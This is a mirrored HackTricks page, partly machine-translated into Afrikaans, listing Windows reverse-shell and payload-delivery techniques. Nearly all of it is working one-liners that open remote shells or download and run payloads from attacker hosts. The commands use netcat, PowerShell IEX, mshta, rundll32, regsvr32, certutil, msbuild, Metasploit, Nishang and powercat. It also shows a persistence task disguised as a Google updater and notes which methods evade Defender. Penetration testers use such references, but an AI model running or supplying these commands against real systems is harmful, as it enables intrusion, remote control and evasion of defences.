maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/generic-hacking/reverse-shells/windows.md

21 KiB
Raw Blame History

Shells - Windows

{{#include ../../banners/hacktricks-training.md}}

Lolbas

Die bladsy lolbas-project.github.io is vir Windows soos https://gtfobins.github.io/ is vir linux.
Natuurlik is there aren't SUID files or sudo privileges in Windows, maar dit is nuttig om te weet how sommige binaries misbruik kan word om sekere onverwagte aksies uit te voer soos execute arbitrary code.

NC

nc.exe -e cmd.exe <Attacker_IP> <PORT>

NCAT

slagoffer

ncat.exe <Attacker_IP> <PORT>  -e "cmd.exe /c (cmd.exe  2>&1)"
#Encryption to bypass firewall
ncat.exe <Attacker_IP> <PORT eg.443> --ssl -e "cmd.exe /c (cmd.exe  2>&1)"

aanvaller

ncat -l <PORT>
#Encryption to bypass firewall
ncat -l <PORT eg.443> --ssl

SBD

sbd is a portable and secure Netcat alternative. Dit werk op Unix-agtige stelsels en Win32. Met funksies soos sterk enkripsie, programuitvoering, aanpasbare bronpoorte en deurlopende herverbinding bied sbd 'n veelsydige oplossing vir TCP/IP-kommunikasie. Vir Windows-gebruikers kan die sbd.exe-weergawe van die Kali Linux-distributie as 'n betroubare vervanging vir Netcat gebruik word.

# Victims machine
sbd -l -p 4444 -e bash -v -n
listening on port 4444


# Atackers
sbd 10.10.10.10 4444
id
uid=0(root) gid=0(root) groups=0(root)

Python

#Windows
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

Perl

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

#Windows
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Lua

lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

OpenSSH

Attacker (Kali)

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response

Slagoffer

#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

Powershell

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile

Proses wat netwerkoproep uitvoer: powershell.exe
Payload geskryf op skyf: NEE (ten minste nêrens wat ek kon vind deur procmon nie !)

powershell -exec bypass -f \\webdavserver\folder\payload.ps1

Proses wat 'n netwerkoproep maak: svchost.exe
Payload op skyf geskryf: WebDAV client local cache

Eenreël:

$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Kry meer inligting oor verskillende Powershell Shells aan die einde van hierdie dokument

Mshta

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

mshta http://webserver/payload.hta

mshta \\webdavserver\folder\payload.hta

Voorbeeld van hta-psh reverse shell (gebruik hta om 'n PS backdoor af te laai en uit te voer)

<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>

Jy kan 'n Koadic zombie baie maklik download & execute met die stager hta

hta voorbeeld

Vanaf hier

<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "cmd.exe /c calc.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>

mshta - sct

Vanaf hier

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:C:\local\path\scriptlet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

Mshta - Metasploit

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit

Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit

Gedetecteer deur Defender

Rundll32

Dll hello world example

rundll32 \\webdavserver\folder\payload.dll,entrypoint

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

Gedetecteer deur Defender

Rundll32 - sct

Vanaf hier

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

Rundll32 - Metasploit

use windows/smb/smb_delivery
run
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0

Rundll32 - Koadic

use stager/js/rundll32_js
set SRVHOST 192.168.1.107
set ENDPOINT sales
run
#Koadic will tell you what you need to execute inside the victim, it will be something like:
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();

Regsvr32

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Waargeneem deur verdediger

Regsvr32 arbitrêre DLL-export met die /i-argument (toegangsbeheer en persistentie)

Behalwe dat dit remote scriptlets (scrobj.dll) laai, sal regsvr32.exe 'n plaaslike DLL laai en sy DllRegisterServer/DllUnregisterServer exports aanroep. Aangepaste loaders misbruik dit gereeld om arbitrêre kode uit te voer terwyl hulle by 'n ondertekende LOLBin inpas. Twee tradecraft-aantekeninge wat in die veld waargeneem is:

  • Gatekeeping-argument: die DLL sluit tensy 'n spesifieke skakelaar via /i:<arg> deurgegee word, bv. /i:--type=renderer om Chromium renderer-kindprosesse na te boots. Dit verminder per ongeluk uitvoering en frustreer sandkaste.
  • Persistensie: skeduleer regsvr32 om die DLL te laat loop met stille en hoë voorregte en die vereiste /i-argument, terwyl dit voordoen as 'n updater-taak:
Register-ScheduledTask \
-Action (New-ScheduledTaskAction -Execute "regsvr32" -Argument "/s /i:--type=renderer \"%APPDATA%\Microsoft\SystemCertificates\<name>.dll\"") \
-Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) \
-TaskName 'GoogleUpdaterTaskSystem196.6.2928.90.{FD10B0DF-...}' \
-TaskPath '\\GoogleSystem\\GoogleUpdater' \
-Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -DontStopOnIdleEnd) \
-RunLevel Highest

Sien ook: ClickFix clipboardtoPowerShell variant wat 'n JS-loader laai en later met regsvr32 persistensie bewerkstellig. {{#ref}} ../../generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md {{#endref}}

From here

<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
<scriptlet>
<registration
progid="PoC"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>

Regsvr32 - Metasploit

use multi/script/web_delivery
set target 3
set payload windows/meterpreter/reverse/tcp
set lhost 10.2.0.5
run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll

Jy kan 'n Koadic zombie baie maklik aflaai en uitvoer met die stager regsvr

Certutil

Laai 'n B64dll af, dekodeer dit en voer dit uit.

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

Laai 'n B64exe af, dekodeer dit en voer dit uit.

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

Gedetecteer deur defender

Cscript/Wscript

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""

Cscript - Metasploit

msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs

Gevind deur defender

PS-Bat

\\webdavserver\folder\batchfile.bat

Proses wat netwerkoproep uitvoer: svchost.exe
Payload op skyf geskryf: WebDAV client local cache

msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd`

\\10.8.0.3\kali\shell.bat

Gevind deur defender

MSIExec

Aanvaller

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
python -m SimpleHTTPServer 80

Slagoffer:

victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi

Gevind

Wmic

wmic os get /format:"https://webserver/payload.xsl"

Voorbeeld xsl-lêer from here:

<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
]]>
</ms:script>
</stylesheet>

Nie opgespoor

Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer met die stager wmic

Msbuild

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Jy kan hierdie tegniek gebruik om Application Whitelisting en Powershell.exe-beperkings te omseil. Jy sal 'n PS shell kry.
Laai dit net af en voer dit uit: https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj

Nie opgespoor

CSC

Kompileer C# code op die slagoffer se masjien.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs

Jy kan 'n basiese C# reverse shell hiervandaan aflaai: https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc

Nie opgespoor nie

Regasm/Regsvc

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Ek het dit nog nie probeer nie

https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182

Odbcconf

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

Ek het dit nog nie probeer nie

https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2

Powershell Shells

PS-Nishang

https://github.com/samratashok/nishang

In die Shells-gids is daar baie verskillende shells. Om Invoke-PowerShellTcp.ps1 af te laai en uit te voer, maak 'n kopie van die skrip en voeg dit aan die einde van die lêer:

Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444

Begin om die script op 'n web server te bedien en voer dit aan die slagoffer se kant uit:

powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"

Defender bespeur dit nie as kwaadwillige kode nie (nog nie, 3/04/2019).

TODO: Kontroleer ander nishang shells

PS-Powercat

https://github.com/besimorhino/powercat

Laai af, begin 'n webbediener, begin die listener, en voer dit op die slagoffer se kant uit:

powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"

Defender detecteer dit nie as kwaadwillige kode nie (nog nie, 3/04/2019).

Ander opsies wat deur powercat aangebied word:

Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files...

Serve a cmd Shell:
powercat -l -p 443 -e cmd
Send a cmd Shell:
powercat -c 10.1.1.1 -p 443 -e cmd
Send a powershell:
powercat -c 10.1.1.1 -p 443 -ep
Send a powershell UDP:
powercat -c 10.1.1.1 -p 443 -ep -u
TCP Listener to TCP Client Relay:
powercat -l -p 8000 -r tcp:10.1.1.16:443
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
powercat -c 10.1.1.15 -p 443 -e cmd -g
Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep

Empire

https://github.com/EmpireProject/Empire

Skep 'n powershell launcher, stoor dit in 'n lêer en laai dit af en voer dit uit.

powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"

Bespeur as kwaadwillige kode

MSF-Unicorn

https://github.com/trustedsec/unicorn

Skep 'n powershell-weergawe van die metasploit backdoor met unicorn

python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443

Begin msfconsole met die geskepte resource:

msfconsole -r unicorn.rc

Begin 'n webbediener wat die powershell_attack.txt lêer bedien en voer dit op die slagoffer uit:

powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"

Gedetecteer as kwaadwillige kode

Meer

PS>Attack PS console met 'n paar offensiewe PS-modules vooraf gelaai (versleuteld)
https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9
WinPWN PS console met 'n paar offensiewe PS-modules en proxy-detectie (IEX)

Verwysings

{{#include ../../banners/hacktricks-training.md}}